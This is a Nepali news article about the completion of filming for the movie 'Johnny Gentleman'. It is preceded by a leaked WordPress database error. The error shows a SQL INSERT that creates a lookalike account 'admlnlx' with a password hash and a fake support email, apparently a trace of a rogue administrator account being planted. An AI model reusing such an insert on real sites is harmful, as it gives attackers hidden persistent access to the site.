WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0GH46kIUECzdCP6jBH3h1CnAv4/071', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:14:01', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ १४ –
चलचित्र ‘जोनी जेन्टलम्यान’को इन्ड क्ल्याप भएको छ । बिहिबार काठमाण्डौको एक बारमा प्रमोशनल गीत खिच्दै चलचित्रको छायांकन सकिएको घोषणा गरिएको हो ।
घोषणा कार्यक्रममा चलचित्रका मुख्य कलाकारले केक काटे र सेलिव्रेशन गरे । नितिन चन्दको निर्देशनमा तयार भएको यो चलचित्रमा पल शाह र आँचल शर्माको मुख्य भूमिका छ ।
चलचित्रलाई स्टाइलिस्ट बनाउन विशेष कोशिश गरिएको निर्देशक चन्दले जानकारी दिए । कमेडी, एक्सन र प्रेमको मिश्रण चलचित्रमा छ । कार्यक्रममा पल र आँचलको प्रेमको चर्चा पनि भयो । तर, आँचलले भने पलसँग नाम जोडिदा आफूलाई फाइदा नै भएको बताइन् । चलचित्रको प्रदर्शन मिति तोकिएको छैन ।
नेपाल र भारतका विभिन्न रमणिय स्थानमा चलचित्रको छायांकन गरिएको छ । दशै अगाडिबाट छायांकन सुरु गरिएपनि ६० दिन पुरा खिचिएको निर्देशकले दाबी गरे । पल र आँचलले चलचित्र ‘नाई नभन्नु ल ४’बाट चलचित्र करिअर सुरु गरेका थिए .